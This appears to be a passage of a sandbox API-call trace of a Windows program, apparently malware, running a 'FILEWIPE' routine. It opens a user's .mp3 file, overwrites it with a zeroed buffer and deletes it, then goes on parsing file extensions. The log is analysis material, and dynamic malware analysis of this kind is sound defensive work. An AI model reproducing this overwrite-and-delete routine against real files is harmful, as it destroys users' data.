[0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.612] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.613] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.613] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.613] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.613] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.613] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.614] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.614] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.614] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.615] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.615] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0xe4915d20, ftLastWriteTime.dwHighDateTime=0x1d5c1b9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 0x7c2100 [0037.616] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.616] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.616] CharLowerBuffW (in: lpsz="byte[21468]", cchLength=0xb | out: lpsz="byte[21468]") returned 0xb [0037.616] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.616] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.616] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.616] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.617] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.617] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.617] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.618] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.618] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\65ojnsjozhlti0vkh7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0037.619] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.619] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.619] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.620] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.620] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.620] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.620] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpFilePart=0x0) returned 0x45 [0037.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0x16227900, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 0x7c2100 [0037.621] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\65ojnsjozhlti0vkh7.mp3")) returned 1 [0037.622] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x591ad440, ftCreationTime.dwHighDateTime=0x1d5b9b4, ftLastAccessTime.dwLowDateTime=0xe4915d20, ftLastAccessTime.dwHighDateTime=0x1d5c1b9, ftLastWriteTime.dwLowDateTime=0x16227900, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x53dc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="65ojNSJoZHlTi0VKh7.mp3", cAlternateFileName="65OJNS~1.MP3")) returned 0 [0037.622] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.622] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.622] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.622] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.622] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) 